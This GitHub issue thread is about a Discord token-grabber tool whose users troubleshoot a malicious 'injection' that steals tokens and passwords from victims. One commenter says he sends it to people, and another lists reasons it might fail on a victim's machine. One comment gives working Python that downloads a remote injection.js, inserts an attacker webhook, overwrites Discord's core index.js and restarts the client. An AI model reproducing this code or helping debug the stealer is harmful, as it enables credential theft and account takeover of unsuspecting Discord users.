### ISSUE TITLE
injection

### ISSUE THREAD

**Issue by DylieMan102** [Rdimo/Hazard-Token-Grabber-V2#194]
the injector is still not working. i ran it changed password and it did not give me new password and old or token. it did nothing

**Comment by Rdimo** [comment]
working on it, also mind sharing the injection you use? Use the one directly for github or a forked one?

**Comment by DylieMan102** [comment]
used the normal one thats already in the grabber source
the one you provided

**Comment by DylieMan102** [comment]
it used to work but only 1 time. i would say a few days ago

**Comment by Rdimo** [comment]
huh, weird. let me look into it

**Comment by Rdimo** [comment]
@DylieMan102 the injection worked just fine for me, nothing bugged out or anything, on issue I saw tho was that the 2fa codes wasn't getting sent and thats because of this 
![image](https://user-images.githubusercontent.com/80375661/162382582-a00a89c3-5f4f-4570-b8ac-2134b1bca44f.png)
which is nothing I can do about

**Comment by DylieMan102** [comment]
i do not have 2fa
 i changed the webhook built it an ran the program token got sent and everything then i changed pass nothing new came

**Comment by Rdimo** [comment]
so the login one worked but the password change didnt?

**Comment by DylieMan102** [comment]
yes

**Comment by Rdimo** [comment]
ight updated it now @DylieMan102 see if its better now

**Comment by DylieMan102** [comment]
ok 1 min

**Comment by DylieMan102** [comment]
nope same thing. gives token first time then when you change pass not giving new token or pass

**Comment by Rdimo** [comment]
huh, weird. Join the [discord](https://cheataway.com/) and contact me

**Comment by Maywitz** [comment]
Is the injection completely fixed?

**Comment by addi00000** [comment]
It was never broken

**Comment by DylieMan102** [comment]
@addi00000 well its not working so how is it not

**Comment by Maywitz** [comment]
@DylieMan102 are you using the latest version updated 9 hours ago?

**Comment by DylieMan102** [comment]
@Maywitz yes and its  not giving new pass or token when changed. only gives token first time ( on run)

**Comment by addi00000** [comment]
Try this code in its own file and see if it injects.

```py
def inject(webhook_url):
    appdata = os.getenv("localappdata")
    for _dir in os.listdir(appdata):
        if 'discord' in _dir.lower():
            for __dir in os.listdir(os.path.abspath(appdata+os.sep+_dir)):
                if match(r'app-(\d*\.\d*)*', __dir):
                    abspath = os.path.abspath(appdata+os.sep+_dir+os.sep+__dir) 
                    f = requests.get("https://raw.githubusercontent.com/Rdimo/Discord-Injection/master/injection.js").text.replace("%WEBHOOK%", webhook_url)
                    with open(abspath+'\\modules\\discord_desktop_core-2\\discord_desktop_core\\index.js', 'w', encoding="utf-8") as indexFile:
                        indexFile.write(f)
                    os.startfile(abspath+os.sep+_dir+'.exe')

inject("WEBHOOK_HERE")
```

**Comment by addi00000** [comment]
may be an issue with the obfuscation?

**Comment by LocalSmail** [comment]
u sure u havent touched the code?

**Comment by LocalSmail** [comment]
like editing it?

**Comment by DylieMan102** [comment]
yes i am sure. i redownloaded it to my webhook and thats it

**Comment by LocalSmail** [comment]
you know they have to change their password to get the pass log etc right?

**Comment by addi00000** [comment]
@DylieMan102 https://github.com/Rdimo/Hazard-Token-Grabber-V2/issues/194#issuecomment-1093156228

**Comment by DylieMan102** [comment]
ok

**Comment by LocalSmail** [comment]
> ok

you know they have to change their password in order for you to get the new one right?

**Comment by DylieMan102** [comment]
@LocalSmail yes ik

**Comment by LocalSmail** [comment]
ok

**Comment by DylieMan102** [comment]
pass has been changed and nothing new

**Comment by LocalSmail** [comment]
call me Antwan#1110

**Comment by DylieMan102** [comment]
@addi00000 tried by itself did not work

**Comment by Rdimo** [comment]
not sure what to do with this, injection works fine for me and if I change pass I get everything in my webhook

**Comment by DylieMan102** [comment]
well its not working for me. even when i send it to people and they change there pass does not work

**Comment by dekrypted** [comment]
> well its not working for me. even when i send it to people and they change there pass does not work

Possible causes:
- Victim has an AV that detects it
- Victim has DTP
- The Injection isn't working for them
